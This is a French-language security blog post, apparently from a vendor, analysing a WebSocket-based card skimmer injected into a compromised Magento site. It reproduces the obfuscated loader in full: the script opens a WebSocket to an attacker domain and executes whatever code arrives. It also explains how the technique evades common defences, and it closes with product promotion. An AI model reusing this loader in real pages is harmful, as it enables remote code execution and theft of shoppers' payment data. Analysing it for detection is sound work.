Chez cside, nous surveillons activement les attaques sur la chaîne d'approvisionnement côté client, en nous concentrant sur l'évolution des tactiques, techniques et procédures (TTPs) utilisées par les acteurs malveillants.
L'une des attaques les plus fréquemment observées ces derniers mois cible les sites eCommerce construits sur le framework Magento.
Nous suivons notamment de près l'attaque Cosmic Sting (CVE-2024-34102), largement documentée, notamment par Sansec (https://sansec.io/research/cosmicsting).
Nouvelle TTP observée : traditionnellement, ces attaques impliquaient l'injection de JavaScript (JS) tiers pour créer une superposition permettant de dérober les informations de carte bancaire et d'exfiltrer des données sensibles.
Cependant, hier (dimanche 13 octobre), nous avons observé une TTP nouvelle et particulièrement intéressante dans laquelle l'attaquant a adopté une approche différente.
Plutôt que de charger directement du JavaScript malveillant dans le site Magento, il a établi une connexion WebSocket pour communiquer avec un serveur tiers. Cette attaque ciblait le site sosessentials.co.uk, qui fonctionne sous Magento 2.4 (Community).
Au cours de notre investigation, nous avons trouvé le script injecté suivant sur le site compromis :
<script>
const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23];
const zep = 42;
window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo => hwo ^ zep)) + encodeURIComponent(location.href));
window.sss.addEventListener('message', event => {new Function(event.data)()});
</script>Après décodage de ce script obfusqué, nous avons découvert qu'il établit une connexion WebSocket vers l'URL suivante : wss://gstatlc[.]org/jivo?source=.
Au moment de l'analyse, nous n'avons pas pu obtenir de réponse du serveur distant, mais au regard des schémas d'attaque observés, nous pensons que cette connexion était vraisemblablement destinée à du web skimming, c'est-à-dire au vol de données clients telles que les informations de carte bancaire. Détails du domaine Le site distant, gstatlc.org, a été créé il y a seulement trois jours, ce qui constitue un signal d'alarme évident indiquant que ce domaine fait probablement partie de l'infrastructure de l'attaquant.
Voici les informations pertinentes sur le domaine :
- Créé le : 2024-10-11
- Expire le : 2025-10-11
- Mis à jour le : 2024-10-11
La nouvelle tendance : les WebSockets au service du skimming. Cette attaque représente une évolution intéressante des TTPs, d'autant que de plus en plus d'éditeurs de solutions de sécurité commencent à détecter les attaques classiques par injection de JavaScript.
Plutôt que de simplement charger du JavaScript malveillant via HTTP, l'attaquant a établi une connexion WebSocket (protocole WSS) pour charger des scripts et potentiellement d'autres données à distance. Cela complexifie l'attaque, car les WebSockets offrent une communication bidirectionnelle en temps réel, plus difficile à détecter et à inspecter que les requêtes HTTP classiques.
Pourquoi les WebSockets ?
L'utilisation des WebSockets (WSS) à des fins malveillantes présente plusieurs aspects intéressants :
Communication en temps réel : les WebSockets permettent une communication continue et bidirectionnelle entre le client et le serveur distant, ce qui facilite l'exfiltration de données ou la modification de scripts à la volée. Contournement des défenses traditionnelles : de nombreuses défenses web et politiques de sécurité du contenu (CSP) sont axées sur le blocage des chargements de ressources via HTTP.
Les WebSockets, utilisant le protocole WSS, peuvent échapper à la détection si leur trafic n'est pas correctement surveillé. Moins de dépendance aux rechargements de page : contrairement aux méthodes traditionnelles où les attaquants s'appuient sur l'injection de scripts pour dérober des données lors du chargement des pages ou des interactions utilisateur, les WebSockets permettent une surveillance continue et une exfiltration de données sensibles sans nécessiter que l'utilisateur recharge la page ou navigue vers une autre.
L'approche cside pour la protection côté client
Chez cside, nous jouons un rôle actif dans la protection de nos utilisateurs contre les menaces côté client en constante évolution, comme celle décrite ci-dessus. L'une de nos stratégies clés consiste à proxifier les fichiers JavaScript à des fins d'analyse. Cette approche nous permet d'intercepter et d'inspecter les fichiers JavaScript que les sites tentent de charger depuis des serveurs distants, afin de s'assurer qu'ils sont sains et exempts de tout contenu malveillant.
Cette approche a permis d'améliorer de 30 % la détection et l'interception des fichiers JavaScript distants avant leur exécution dans le navigateur des utilisateurs. Notre système garantit qu'aucun JS malveillant n'est chargé, prévenant ainsi efficacement des attaques telles que le skimming de cartes bancaires et l'exfiltration de données.
Notre surveillance de l'activité côté client garantit que les utilisateurs de cside sont protégés contre ces types d'attaques sophistiquées. Nous surveillons, analysons et bloquons en permanence les scripts nuisibles avant qu'ils ne puissent causer des dommages, offrant ainsi une couche de sécurité supplémentaire à nos utilisateurs et veillant à ce que leurs informations sensibles restent protégées.
En anticipant les évolutions et en nous adaptant aux nouvelles TTPs, nous nous assurons que nos utilisateurs gardent toujours une longueur d'avance sur les attaquants, protégeant ainsi leurs environnements en ligne contre des menaces telles que cette attaque de skimming basée sur les WebSockets.
